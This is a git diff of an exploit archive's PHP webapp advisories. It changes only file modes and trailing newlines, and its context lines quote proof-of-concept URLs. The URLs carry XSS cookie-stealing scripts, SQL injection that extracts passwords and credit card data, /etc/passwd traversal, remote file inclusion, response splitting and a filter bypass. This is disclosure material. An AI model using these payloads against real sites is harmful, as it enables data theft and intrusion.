a/platforms/php/webapps/25496.txt b/platforms/php/webapps/25496.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25503.txt b/platforms/php/webapps/25503.txt old mode 100755 new mode 100644 index 86b0a1969..6690b74d7 --- a/platforms/php/webapps/25503.txt +++ b/platforms/php/webapps/25503.txt @@ -4,4 +4,4 @@ WoltLab Burning Board is prone to a cross-site scripting vulnerability because t An attacker may leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/thread.php?threadid=[Topic_ID]&hilight=[XSS] \ No newline at end of file +http://www.example.com/thread.php?threadid=[Topic_ID]&hilight=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/2551.txt b/platforms/php/webapps/2551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25518.txt b/platforms/php/webapps/25518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25519.txt b/platforms/php/webapps/25519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25523.txt b/platforms/php/webapps/25523.txt old mode 100755 new mode 100644 index bce8056ef..f5d2b83c8 --- a/platforms/php/webapps/25523.txt +++ b/platforms/php/webapps/25523.txt @@ -4,4 +4,4 @@ phpBB is prone to a cross-site scripting vulnerability. This issue is due to a f An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/phpBB2/profile.php?mode=viewprofile&u=\[]\ \ No newline at end of file +http://www.example.com/phpBB2/profile.php?mode=viewprofile&u=\[]\ \ No newline at end of file diff --git a/platforms/php/webapps/25524.txt b/platforms/php/webapps/25524.txt old mode 100755 new mode 100644 index 257f6cf07..69addbc9d --- a/platforms/php/webapps/25524.txt +++ b/platforms/php/webapps/25524.txt @@ -4,4 +4,4 @@ phpBB is prone to a cross-site scripting vulnerability. This issue is due to a f An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/phpBB2/viewtopic.php?p=3&highlight=\[]\ \ No newline at end of file +http://www.example.com/phpBB2/viewtopic.php?p=3&highlight=\[]\ \ No newline at end of file diff --git a/platforms/php/webapps/25528.txt b/platforms/php/webapps/25528.txt old mode 100755 new mode 100644 index e66126551..83f58a607 --- a/platforms/php/webapps/25528.txt +++ b/platforms/php/webapps/25528.txt @@ -4,4 +4,4 @@ WoltLab Burning Board is prone to a cross-site scripting vulnerability. This iss An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/pms.php?folderid=[XSS] \ No newline at end of file +http://www.example.com/pms.php?folderid=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/2553.txt b/platforms/php/webapps/2553.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25531.html b/platforms/php/webapps/25531.html old mode 100755 new mode 100644 index 844ee1bae..d287e5e41 --- a/platforms/php/webapps/25531.html +++ b/platforms/php/webapps/25531.html @@ -9,4 +9,4 @@ The issue is known to affect phpMyVisites 1.3. Other versions may also be affect <form action="http://[pathtoyourphpMyVisites]/login.php" method="POST"> Local file: <input type="text" name="mylang" value="" /> <input type="submit" value="Alexx says RELAX!"> -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/php/webapps/25532.txt b/platforms/php/webapps/25532.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25533.txt b/platforms/php/webapps/25533.txt old mode 100755 new mode 100644 index f9020648c..a6164cd4b --- a/platforms/php/webapps/25533.txt +++ b/platforms/php/webapps/25533.txt @@ -6,4 +6,4 @@ The vendor has not published any specific details about this vulnerability other http://www.example.com/admin_modules/admin_module_info.inc.php?lang_akt[admin_ainfo_hmain]=[XSS] http://www.example.com/src/index_footer-copyright.inc.php?config[release]=[XSS] -http://www.example.com/src/index_thumbs.inc.php?page[thumb_table_width]=[XSS] \ No newline at end of file +http://www.example.com/src/index_thumbs.inc.php?page[thumb_table_width]=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25534.txt b/platforms/php/webapps/25534.txt old mode 100755 new mode 100644 index 9565845c7..7d5dafdf0 --- a/platforms/php/webapps/25534.txt +++ b/platforms/php/webapps/25534.txt @@ -4,4 +4,4 @@ SQWebmail is prone to a HTTP response splitting vulnerability. This issue is due A remote attacker may exploit this vulnerability to influence or misrepresent how Web content is served, cached or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust. -sqwebmail?redirect=%0d%0a%0d%0a[INJECT SCRIPT] \ No newline at end of file +sqwebmail?redirect=%0d%0a%0d%0a[INJECT SCRIPT] \ No newline at end of file diff --git a/platforms/php/webapps/25535.txt b/platforms/php/webapps/25535.txt old mode 100755 new mode 100644 index 2d6856af2..e9f431835 --- a/platforms/php/webapps/25535.txt +++ b/platforms/php/webapps/25535.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos This issue reportedly affects Invision Power Board version 2.0.1; other versions may also be vulnerable. -http://www.example.com/forum/index.php?act=PostCODE=02f=4t=3qpid='[SQL] \ No newline at end of file +http://www.example.com/forum/index.php?act=PostCODE=02f=4t=3qpid='[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/25538.txt b/platforms/php/webapps/25538.txt old mode 100755 new mode 100644 index ee4820995..124b5241c --- a/platforms/php/webapps/25538.txt +++ b/platforms/php/webapps/25538.txt @@ -4,4 +4,4 @@ GrayCMS is prone to a remote file include vulnerability. This issue is due to a An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/CMS/gcms/code/error.php?path_prefix=http://www.example.com/ \ No newline at end of file +http://www.example.com/CMS/gcms/code/error.php?path_prefix=http://www.example.com/ \ No newline at end of file diff --git a/platforms/php/webapps/2554.php b/platforms/php/webapps/2554.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25545.txt b/platforms/php/webapps/25545.txt old mode 100755 new mode 100644 index bb1e60474..f2af52116 --- a/platforms/php/webapps/25545.txt +++ b/platforms/php/webapps/25545.txt @@ -4,4 +4,4 @@ bBlog is prone to an SQL injection vulnerability. This issue is due to a failure Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/[blogpath]/?postid=1%20or%201=1 \ No newline at end of file +http://www.example.com/[blogpath]/?postid=1%20or%201=1 \ No newline at end of file diff --git a/platforms/php/webapps/25548.txt b/platforms/php/webapps/25548.txt old mode 100755 new mode 100644 index 504ffc716..26bf6fc83 --- a/platforms/php/webapps/25548.txt +++ b/platforms/php/webapps/25548.txt @@ -4,4 +4,4 @@ PHPCart is prone to a remote input validation vulnerability. The issue exists be A remote attacker may exploit this issue to manipulate invoice and payment charges for a specific PHPCart order. -http://www.example.com/phpcart.php?action=add&id=1002&descr=Mobile%20Phone&price=0&postage=&quantity=100 \ No newline at end of file +http://www.example.com/phpcart.php?action=add&id=1002&descr=Mobile%20Phone&price=0&postage=&quantity=100 \ No newline at end of file diff --git a/platforms/php/webapps/25549.txt b/platforms/php/webapps/25549.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2555.txt b/platforms/php/webapps/2555.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25550.txt b/platforms/php/webapps/25550.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25551.txt b/platforms/php/webapps/25551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25552.txt b/platforms/php/webapps/25552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25553.txt b/platforms/php/webapps/25553.txt old mode 100755 new mode 100644 index 39d4c69b5..d039b137d --- a/platforms/php/webapps/25553.txt +++ b/platforms/php/webapps/25553.txt @@ -8,4 +8,4 @@ An attacker may exploit these issues to manipulate SQL queries to the underlying **Update: Dokeos, which is based on claroline source code, is also prone to come of these issues. -http:///www.example.com/claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1-- \ No newline at end of file +http:///www.example.com/claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1-- \ No newline at end of file diff --git a/platforms/php/webapps/25555.txt b/platforms/php/webapps/25555.txt old mode 100755 new mode 100644 index a877908ca..638a51af5 --- a/platforms/php/webapps/25555.txt +++ b/platforms/php/webapps/25555.txt @@ -5,4 +5,4 @@ Koobi CMS is prone to an SQL injection vulnerability. This issue is due to a fai Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/index.php?p='[SQL code] -http://www.example.com/index.php?area=1&p='[SQL code] \ No newline at end of file +http://www.example.com/index.php?area=1&p='[SQL code] \ No newline at end of file diff --git a/platforms/php/webapps/25556.txt b/platforms/php/webapps/25556.txt old mode 100755 new mode 100644 index ddc8d9b79..75dd655fa --- a/platforms/php/webapps/25556.txt +++ b/platforms/php/webapps/25556.txt @@ -4,4 +4,4 @@ Koobi CMS is prone to an SQL injection vulnerability. This issue is due to a fai Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/index.php?q='[SQL code] \ No newline at end of file +http://www.example.com/index.php?q='[SQL code] \ No newline at end of file diff --git a/platforms/php/webapps/25558.txt b/platforms/php/webapps/25558.txt old mode 100755 new mode 100644 index 8f57feae1..22d3dfab7 --- a/platforms/php/webapps/25558.txt +++ b/platforms/php/webapps/25558.txt @@ -4,4 +4,4 @@ The notes module for phpBB is prone to an SQL injection vulnerability. This issu Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/posting_notes.php?mode=editpost&p=-99%20UNION%20SELECT%200,0,username,0,0,0,0,0,0%20FROM%20orionphpbb_users%20WHERE%20user_id=2/* \ No newline at end of file +http://www.example.com/posting_notes.php?mode=editpost&p=-99%20UNION%20SELECT%200,0,username,0,0,0,0,0,0%20FROM%20orionphpbb_users%20WHERE%20user_id=2/* \ No newline at end of file diff --git a/platforms/php/webapps/2556.txt b/platforms/php/webapps/2556.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25560.txt b/platforms/php/webapps/25560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25564.txt b/platforms/php/webapps/25564.txt old mode 100755 new mode 100644 index fe5b47c15..04f0dbabc --- a/platforms/php/webapps/25564.txt +++ b/platforms/php/webapps/25564.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th This issue reportedly affects Amazon Webstore version 04050100; other versions may also be vulnerable. -http://www.example.com/index.php?currentIsExpanded=0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&currentNumber=8 \ No newline at end of file +http://www.example.com/index.php?currentIsExpanded=0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&currentNumber=8 \ No newline at end of file diff --git a/platforms/php/webapps/25565.txt b/platforms/php/webapps/25565.txt old mode 100755 new mode 100644 index 69d615c12..96a0f08c9 --- a/platforms/php/webapps/25565.txt +++ b/platforms/php/webapps/25565.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th This issue reportedly affects Amazon Webstore version 04050100; other versions may also be vulnerable. -http://www.example.com/index.php?function=search&searchFor=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/index.php?function=search&searchFor=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25566.txt b/platforms/php/webapps/25566.txt old mode 100755 new mode 100644 index c4d035d92..59208f84f --- a/platforms/php/webapps/25566.txt +++ b/platforms/php/webapps/25566.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th This issue reportedly affects Amazon Webstore version 04050100; other versions may also be vulnerable. -http://www.example.com/uk/list/c/software_CAD_Technical_60002_uk.htm?currentNumber=4.3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&currentIsExpanded=0 \ No newline at end of file +http://www.example.com/uk/list/c/software_CAD_Technical_60002_uk.htm?currentNumber=4.3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&currentIsExpanded=0 \ No newline at end of file diff --git a/platforms/php/webapps/25567.txt b/platforms/php/webapps/25567.txt old mode 100755 new mode 100644 index bb30f278e..0ab1c24aa --- a/platforms/php/webapps/25567.txt +++ b/platforms/php/webapps/25567.txt @@ -6,4 +6,4 @@ A remote attacker may exploit this vulnerability to influence or misrepresent ho This issue reportedly affects Amazon Webstore version 04050100; other versions may also be vulnerable. -http://www.example.com/store/uk/product/">%0d%0aSet-Cookie:%20HTTP_response_splitting%3dYES%0d%0aFoo:%20bar.htm \ No newline at end of file +http://www.example.com/store/uk/product/">%0d%0aSet-Cookie:%20HTTP_response_splitting%3dYES%0d%0aFoo:%20bar.htm \ No newline at end of file diff --git a/platforms/php/webapps/25568.txt b/platforms/php/webapps/25568.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25569.txt b/platforms/php/webapps/25569.txt old mode 100755 new mode 100644 index 010fd75ec..c2140e8f7 --- a/platforms/php/webapps/25569.txt +++ b/platforms/php/webapps/25569.txt @@ -5,4 +5,4 @@ PHPCoin is reportedly affected by multiple SQL injection vulnerabilities. These Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/mod.php?mod=pages&mode=list&dtopic_id=SQL_INJECTION'&phpcoinsessid=fa7905a749dbdc698838930de0f99f4b -http://www.example.com/mod.php?mod=pages&mode=list&dcat_id=SQL_INJECTION'&phpcoinsessid=fa7905a749dbdc698838930de0f99f4b \ No newline at end of file +http://www.example.com/mod.php?mod=pages&mode=list&dcat_id=SQL_INJECTION'&phpcoinsessid=fa7905a749dbdc698838930de0f99f4b \ No newline at end of file diff --git a/platforms/php/webapps/2557.txt b/platforms/php/webapps/2557.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25570.txt b/platforms/php/webapps/25570.txt old mode 100755 new mode 100644 index 78fca1ead..0525ab5fb --- a/platforms/php/webapps/25570.txt +++ b/platforms/php/webapps/25570.txt @@ -4,4 +4,4 @@ JGS-Portal is prone to an SQL injection. This issue may potentially be exploited The consequences of exploitation will depend on the nature of the vulnerable SQL query and the capabilities of the underlying database implementation. -http://www.example.com/jgs_portal.php?id='SQL_here \ No newline at end of file +http://www.example.com/jgs_portal.php?id='SQL_here \ No newline at end of file diff --git a/platforms/php/webapps/25575.txt b/platforms/php/webapps/25575.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25576.txt b/platforms/php/webapps/25576.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25577.txt b/platforms/php/webapps/25577.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25578.txt b/platforms/php/webapps/25578.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25579.txt b/platforms/php/webapps/25579.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2558.txt b/platforms/php/webapps/2558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25580.txt b/platforms/php/webapps/25580.txt old mode 100755 new mode 100644 index a82c1c50c..2b6898e4c --- a/platforms/php/webapps/25580.txt +++ b/platforms/php/webapps/25580.txt @@ -7,4 +7,4 @@ Attacker-supplied HTML and script code would be able to access properties of the These issues are reported to affect ViArt Shop Enterprise version 2.1.6; other versions may also be vulnerable. http://www.example.com/news_view.php?news_id=3&rp=news.php[XSS-CODE]&page=1 -http://www.example.com/news_view.php?news_id=3&rp=news.php&page=1[XSS-CODE] \ No newline at end of file +http://www.example.com/news_view.php?news_id=3&rp=news.php&page=1[XSS-CODE] \ No newline at end of file diff --git a/platforms/php/webapps/2559.txt b/platforms/php/webapps/2559.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25590.txt b/platforms/php/webapps/25590.txt old mode 100755 new mode 100644 index 60cd92870..db99774e6 --- a/platforms/php/webapps/25590.txt +++ b/platforms/php/webapps/25590.txt @@ -24,4 +24,4 @@ http://www.example.com/view.php?s=advanced&query=&cat=-99%20UNION%20SELECT%20313 http://www.example.com/include/main.php?config[search_disp]=true&include_dir=http://www.example.com -http://www.example.com/attachments.php?file=../../../../../../.. /etc/passwd \ No newline at end of file +http://www.example.com/attachments.php?file=../../../../../../.. /etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/25591.txt b/platforms/php/webapps/25591.txt old mode 100755 new mode 100644 index 3cc2b0d10..91b695762 --- a/platforms/php/webapps/25591.txt +++ b/platforms/php/webapps/25591.txt @@ -23,4 +23,4 @@ Directory traversal proof of concept: http://www.example.com/users/index.php?lang=en.inc/../../../../../../etc/passwd%00 File include proof of concept: -http://www.example.com/users/main.php?p=http://www.example.com \ No newline at end of file +http://www.example.com/users/main.php?p=http://www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/25593.txt b/platforms/php/webapps/25593.txt old mode 100755 new mode 100644 index aa767351e..16e3dcfc3 --- a/platforms/php/webapps/25593.txt +++ b/platforms/php/webapps/25593.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th It is reported this issue may only be exploitable through Microsoft Internet Explorer; this has not been confirmed. -http://www.example.com/index.php?act='><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/index.php?act='><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/25599.txt b/platforms/php/webapps/25599.txt old mode 100755 new mode 100644 index 90c10877f..ebff965c8 --- a/platforms/php/webapps/25599.txt +++ b/platforms/php/webapps/25599.txt @@ -22,4 +22,4 @@ e=&LastName=&Email='"><script>alert(document.cookie)</script>&Biography=dcrab&Pi http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam e=&LastName=&Email=&Biography=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Picture=dcrab -http://www.example.com/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/2560.txt b/platforms/php/webapps/2560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25601.txt b/platforms/php/webapps/25601.txt old mode 100755 new mode 100644 index 8c8ab078a..1f54cc276 --- a/platforms/php/webapps/25601.txt +++ b/platforms/php/webapps/25601.txt @@ -6,4 +6,4 @@ A successful exploit of the SQL-injection issues could allow an attacker to comp An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst='"><script>alert(document.cookie)</script>&olimit=0&cat=&key1=&psku= \ No newline at end of file +http://www.example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst='"><script>alert(document.cookie)</script>&olimit=0&cat=&key1=&psku= \ No newline at end of file diff --git a/platforms/php/webapps/25602.txt b/platforms/php/webapps/25602.txt old mode 100755 new mode 100644 index e7eb59a55..b5c18005f --- a/platforms/php/webapps/25602.txt +++ b/platforms/php/webapps/25602.txt @@ -8,4 +8,4 @@ An attacker may leverage the cross-site scripting issues to execute arbitrary sc http://www.example.com/demo31/upstracking.php?trackingnum='"><script>alert(document.cookie)</script>&reqagree=checked&m= http://www.example.com/demo31/upstracking.php?trackingnum=&reqagree='"><script>alert(document.cookie)</script>&m= -http://www.example.com/demo31/upstracking.php?trackingnum=&reqagree=checked&m='"><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/demo31/upstracking.php?trackingnum=&reqagree=checked&m='"><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/25603.txt b/platforms/php/webapps/25603.txt old mode 100755 new mode 100644 index f69dee8aa..2441d86bd --- a/platforms/php/webapps/25603.txt +++ b/platforms/php/webapps/25603.txt @@ -6,4 +6,4 @@ A successful exploit of the SQL-injection issues could allow an attacker to comp An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst=y&olimit=0&cat=&key1=&psku='SQL_INJECTION \ No newline at end of file +http://www.example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst=y&olimit=0&cat=&key1=&psku='SQL_INJECTION \ No newline at end of file diff --git a/platforms/php/webapps/25604.txt b/platforms/php/webapps/25604.txt old mode 100755 new mode 100644 index 89ac79c8a..8f1f54e78 --- a/platforms/php/webapps/25604.txt +++ b/platforms/php/webapps/25604.txt @@ -6,4 +6,4 @@ A successful exploit of the SQL-injection issues could allow an attacker to comp An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/demo31/upstnt.php?zid=1&lid=1&cartid='SQL_INJECTION \ No newline at end of file +http://www.example.com/demo31/upstnt.php?zid=1&lid=1&cartid='SQL_INJECTION \ No newline at end of file diff --git a/platforms/php/webapps/25605.txt b/platforms/php/webapps/25605.txt old mode 100755 new mode 100644 index 26369cf93..3f32dbc3d --- a/platforms/php/webapps/25605.txt +++ b/platforms/php/webapps/25605.txt @@ -28,4 +28,4 @@ # # Amirh03in # -############## \ No newline at end of file +############## \ No newline at end of file diff --git a/platforms/php/webapps/2561.txt b/platforms/php/webapps/2561.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25612.txt b/platforms/php/webapps/25612.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25614.txt b/platforms/php/webapps/25614.txt old mode 100755 new mode 100644 index 90ba28328..d0f270e21 --- a/platforms/php/webapps/25614.txt +++ b/platforms/php/webapps/25614.txt @@ -4,4 +4,4 @@ MidiCart PHP is prone to an SQL injection vulnerability. This issue is due to a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT null, null, CreditCard, ExpDate, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment \ No newline at end of file +http://www.example.com/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT null, null, CreditCard, ExpDate, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment \ No newline at end of file diff --git a/platforms/php/webapps/25615.txt b/platforms/php/webapps/25615.txt old mode 100755 new mode 100644 index 44f342ae0..d8bb61a00 --- a/platforms/php/webapps/25615.txt +++ b/platforms/php/webapps/25615.txt @@ -8,4 +8,4 @@ This issue is reported to affect both the PHP and ASP versions of MidiCart Shopp http://www.example.com/shop/item_list.php?maingroup=-99 'UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment -http://www.example.com/path/item_list.asp?maingroup=[SQL INJECTION] \ No newline at end of file +http://www.example.com/path/item_list.asp?maingroup=[SQL INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/25616.txt b/platforms/php/webapps/25616.txt old mode 100755 new mode 100644 index 0fc485b4f..4a23f3877 --- a/platforms/php/webapps/25616.txt +++ b/platforms/php/webapps/25616.txt @@ -8,4 +8,4 @@ This issue is reported to affect both the PHP and ASP versions of MidiCart Shopp http://www.example.com/shop/item_list.php?secondgroup=-99 'UNION SELECT null, null, creditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment -http://www.example.com/path/item_list.asp?maingroup=Something&secondgroup=[SQL INJECTION] \ No newline at end of file +http://www.example.com/path/item_list.asp?maingroup=Something&secondgroup=[SQL INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/25617.txt b/platforms/php/webapps/25617.txt old mode 100755 new mode 100644 index 27542ba45..6e79301ff --- a/platforms/php/webapps/25617.txt +++ b/platforms/php/webapps/25617.txt @@ -4,4 +4,4 @@ MidiCart PHP is prone to an SQL injection vulnerability. This issue is due to a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/shop/item_show.php?code_no=99 ') UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment \ No newline at end of file +http://www.example.com/shop/item_show.php?code_no=99 ') UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment \ No newline at end of file diff --git a/platforms/php/webapps/25618.txt b/platforms/php/webapps/25618.txt old mode 100755 new mode 100644 index 996ba682e..c986df7f5 --- a/platforms/php/webapps/25618.txt +++ b/platforms/php/webapps/25618.txt @@ -4,4 +4,4 @@ MidiCart PHP is prone to a cross-site scripting vulnerability. This issue is due An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/shop/search_list.php?chose=item&searchstring=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E \ No newline at end of file +http://www.example.com/shop/search_list.php?chose=item&searchstring=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25619.txt b/platforms/php/webapps/25619.txt old mode 100755 new mode 100644 index 71f7ec62b..e4c68ffd3 --- a/platforms/php/webapps/25619.txt +++ b/platforms/php/webapps/25619.txt @@ -4,4 +4,4 @@ MidiCart PHP is prone to a cross-site scripting vulnerability. This issue is due An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/shop/item_list.php?secondgroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E \ No newline at end of file +http://www.example.com/shop/item_list.php?secondgroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/2562.txt b/platforms/php/webapps/2562.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25620.txt b/platforms/php/webapps/25620.txt old mode 100755 new mode 100644 index c5dfa9c77..db4f86a52 --- a/platforms/php/webapps/25620.txt +++ b/platforms/php/webapps/25620.txt @@ -4,4 +4,4 @@ MidiCart PHP is prone to a cross-site scripting vulnerability. This issue is due An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/shop/item_list.php?maingroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E \ No newline at end of file +http://www.example.com/shop/item_list.php?maingroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25623.txt b/platforms/php/webapps/25623.txt old mode 100755 new mode 100644 index d96d5489e..3af49b1eb --- a/platforms/php/webapps/25623.txt +++ b/platforms/php/webapps/25623.txt @@ -4,4 +4,4 @@ CJ Ultra Plus is prone to an SQL injection vulnerability. This issue affects the 'out.php' script and could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. -/out.php?url=sad&perm=33333333333333333333333333332'%20UNION%20SELECT%20b12,b12%20FROM%20settings%20INTO%20OUTFILE%20'/path/to/ur/dir/x.txt/* \ No newline at end of file +/out.php?url=sad&perm=33333333333333333333333333332'%20UNION%20SELECT%20b12,b12%20FROM%20settings%20INTO%20OUTFILE%20'/path/to/ur/dir/x.txt/* \ No newline at end of file diff --git a/platforms/php/webapps/25630.txt b/platforms/php/webapps/25630.txt old mode 100755 new mode 100644 index 008bf1519..a219d1ba2 --- a/platforms/php/webapps/25630.txt +++ b/platforms/php/webapps/25630.txt @@ -7,4 +7,4 @@ A successful exploit could allow an attacker to compromise the application, acce This issue reportedly affects Advanced Guestbook version 2.3.1; other versions may also be vulnerable. http://www.example.com/guestbook/index.php?entry=' -http://www.example.com/guestbook/index.php?entry=%27 \ No newline at end of file +http://www.example.com/guestbook/index.php?entry=%27 \ No newline at end of file diff --git a/platforms/php/webapps/25635.txt b/platforms/php/webapps/25635.txt old mode 100755 new mode 100644 index 079335fb6..a37d880c8 --- a/platforms/php/webapps/25635.txt +++ b/platforms/php/webapps/25635.txt @@ -15,4 +15,4 @@ Will be filtered: '/**/UNION/**/SELECT/**/' Will be bypassed: -'/%2A%2A/UNION/%2A%2A/SELECT/%2A%2A/' \ No newline at end of file +'/%2A%2A/UNION/%2A%2A/SELECT/%2A%2A/' \ No newline at end of file diff --git a/platforms/php/webapps/25637.txt b/platforms/php/webapps/25637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25638.txt b/platforms/php/webapps/25638.txt old mode 100755 new mode 100644 index eeba06b90..99ac9203a --- a/platforms/php/webapps/25638.txt +++ b/platforms/php/webapps/25638.txt @@ -8,4 +8,4 @@ http://www.example.com/shoppingcart/catalog.php?action=category_show &id=1%20or%20like%20%60a%%60 http://www.example.com/shoppingcart/demo/catalog.php?action= -category_show&id=1%20or%201=1 \ No newline at end of file +category_show&id=1%20or%201=1 \ No newline at end of file diff --git a/platforms/php/webapps/25639.txt b/platforms/php/webapps/25639.txt old mode 100755 new 